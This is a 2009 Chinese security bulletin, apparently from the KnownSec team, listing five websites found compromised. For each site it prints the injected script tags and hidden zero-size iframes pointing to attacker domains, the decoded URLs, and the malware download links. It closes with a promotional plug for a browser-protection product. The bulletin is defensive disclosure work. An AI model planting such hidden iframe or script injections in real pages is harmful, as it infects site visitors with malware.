2009年1月4日挂马简报

来源:岁月联盟 编辑:zhuzhu 时间:2009-01-04
  最后更新时间:Sat, 4 Jan 2009 0:01:01 (GMT+8)  ________________________________________  知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:诺科电子网上购物、MM公寓、西南财 ...  最后更新时间:Sat, 4 Jan 2009 0:01:01 (GMT+8)
  ________________________________________
  知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:诺科电子网上购物、MM公寓、西南财经大学、????、北京商网。
  诺科电子网上购物(www.nkdz.net)多处被植入恶意代码:
  <script src=hxxp://%76%76%6b%32%2d%63%6e></script>
  <script language=”javascript” src=”hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog” mce_src=”hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog”></script>
  <script src=hxxp://%68%68%6a%32%2d%63%6e></script>
  恶意链接地址解密后为:
  hxxp://vvk2-cn(无效)
  hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog
  hxxp://hhj2-cn(无效)
  通过漏洞攻击,最终下载病毒:
  hxxp://www.67uy66.cn/1.css
  hxxp://www.oiuytr.net/new/a266.css
  MM公寓(www.mm-home.cn)底部被植入恶意代码:
  <script src=hxxp://%75%69%6E%35%2E%63%6E></script>
  <script src=hxxp://%63%63%68%31%2E%63%6E></script>
  <iframe src=hxxp://www.zgynkmk.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.rxgsslla.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.rxgssllt.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.zgcgsslle.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.falalioo.cn/b3.htm width=50 height=0 border=0></iframe>
  恶意链接地址解密后为:
  hxxp://uin5.cn
  hxxp://cch1.cn
  hxxp://www.zgynkmk.cn/b3.htm
  hxxp://www.rxgsslla.cn/b3.htm
  hxxp://www.rxgssllt.cn/b3.htm
  hxxp://www.zgcgsslle.cn/b3.htm
  hxxp://www.falalioo.cn/b3.htm
  通过漏洞攻击,最终下载病毒:
  hxxp://d.ko546.com/down/360Safe.exe
  hxxp://d.ko546.com/new/a1.css
  西南财经大学(kyc.swufe.edu.cn)被植入恶意代码:
  <script src=hxxp://www.8wu.com/1.js></script>
  通过漏洞攻击,最终下载病毒:
  hxxp://qq.18i16.net/sina.css
  hxxp://qq.18i16.net/baidu.cab
  hxxp://qq.18i16.net/exe1/ce.css
  hxxp://qq.18i16.net/exe1/ms.css
  hxxp://qq.18i16.net/exe1/a15.css
  hxxp://qq.18i16.net/exe1/bf.css
  hxxp://qq.18i16.net/exe1/re.css
  hxxp://121.12.173.218/exe1/cx.css
  ????(www.sunlux.net)底部被植入恶意代码:
  <script src=hxxp://%61%76%65%32%2E%63%6E></script>
  <script src=hxxp://%61%76%65%33%2E%63%6E></script>
  <iframe src=hxxp://www.wrmfwk.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.wrmfwj.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.wrmfwi.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.wrmfwu.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.wrmfww.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.hryspap.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.cznylsf.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe frameborder=0 src=”hxxp://caixia88.hrdns.net/index.htm” mce_src=”hxxp://caixia88.hrdns.net/index.htm” width=0 height=0 scrolling=no></iframe>
  <script src=hxxp://%75%69%6E%34%2E%63%6E></script>
  <script src=hxxp://%63%63%68%31%2E%63%6E></script>
  <script src=hxxp://%76%76%6B%31%2E%63%6E></script>
  <iframe src=hxxp://www.falaliqq.cn/b3.htm width=50 height=0 border=0></iframe>
  恶意链接地址解密后为:
  hxxp://ave2.cn
  hxxp://ave3.cn
  hxxp://www.wrmfwk.cn/b3.htm(无效)
  hxxp://www.wrmfwj.cn/b3.htm
  hxxp://www.wrmfwi.cn/b3.htm
  hxxp://uin1.cn
  hxxp://www.wrmfwu.cn/b3.htm
  hxxp://uin2.cn
  hxxp://www.hryspap.cn/b3.htm
  hxxp://www.cznylsf.cn/b3.htm
  hxxp://caixia88.hrdns.net/index.htm(无效)
  hxxp://uin4.cn
  hxxp://uin5.cn
  hxxp://cch1.cn
  hxxp://cch2.cn
  hxxp://vvk1.cn(无效)
  hxxp://hhj1.cn(无效)
  hxxp://vvk2.cn
  hxxp://www.falaliqq.cn/b3.htm
  通过漏洞攻击,最终下载病毒:
  hxxp://d.ko546.com/down/360Safe.exe
  hxxp://d.ko546.com/new/a1.css
  北京商网(www.bjbusiness.com.cn/missvideo/index.html)底部被植入恶意代码:
  <script src=hxxp://%61%76%65%31%2E%63%6E></script>
  <iframe src=hxxp://www.pdh001.cn/b3.htm width=50 height=0 border=0></iframe>
  <script src=hxxp://%61%76%65%32%2E%63%6E></script>
  <iframe src=hxxp://www.wyf005.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.wyf010.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.hrz005.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.union501.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.eqw009.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.wrmfwd.cn/b3.htm width=50 height=0 border=0></iframe>
  <iframe src=hxxp://www.wrmfwk.cn/b3.htm width=50 height=0 border=0></iframe>
  <script src=hxxp://%61%76%65%33%2E%63%6E></script>
  <iframe src=hxxp://www.wrmfwi.cn/b3.htm width=50 height=0 border=0></iframe>
  <script src=hxxp://%75%69%6E%31%2E%63%6E></script>
  <script src=hxxp://%75%69%6E%32%2E%63%6E></script>
  <script src=hxxp://%75%69%6E%33%2E%63%6E></script>
  <script src=hxxp://%75%69%6E%35%2E%63%6E></script>
  <script src=hxxp://%76%76%6B%31%2E%63%6E></script>
  <script src=hxxp://%76%76%6B%32%2E%63%6E></script>
  恶意链接地址解密后为:
  hxxp://ave1.cn
  hxxp://www.pdh001.cn/b3.htm(无效)
  hxxp://ave2.cn
  hxxp://www.wyf005.cn/b3.htm
  hxxp://www.wyf010.cn/b3.htm
  hxxp://www.hrz005.cn/b3.htm
  hxxp://www.union501.cn/b3.htm
  hxxp://www.eqw009.cn/b3.htm
  hxxp://www.wrmfwd.cn/b3.htm
  hxxp://www.wrmfwk.cn/b3.htm(无效)
  hxxp://ave3.cn
  hxxp://uin1.cn
  hxxp://www.wrmfwi.cn/b3.htm
  hxxp://uin2.cn
  hxxp://uin3.cn
  hxxp://uin4.cn
  hxxp://uin5.cn
  hxxp://cch1.cn
  hxxp://vvk1.cn(无效)
  hxxp://hhj1.cn(无效)
  hxxp://vvk2.cn
  通过漏洞攻击,最终下载病毒:
  hxxp://d.ko546.com/down/360Safe.exe
  hxxp://d.ko546.com/new/a1.css
  推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com关键字:挂马
上一篇:英特尔英雄会网站被植入恶意代码
下一篇:东方卫士被挂马安全网站安全谁来保证

最近更新

随机推荐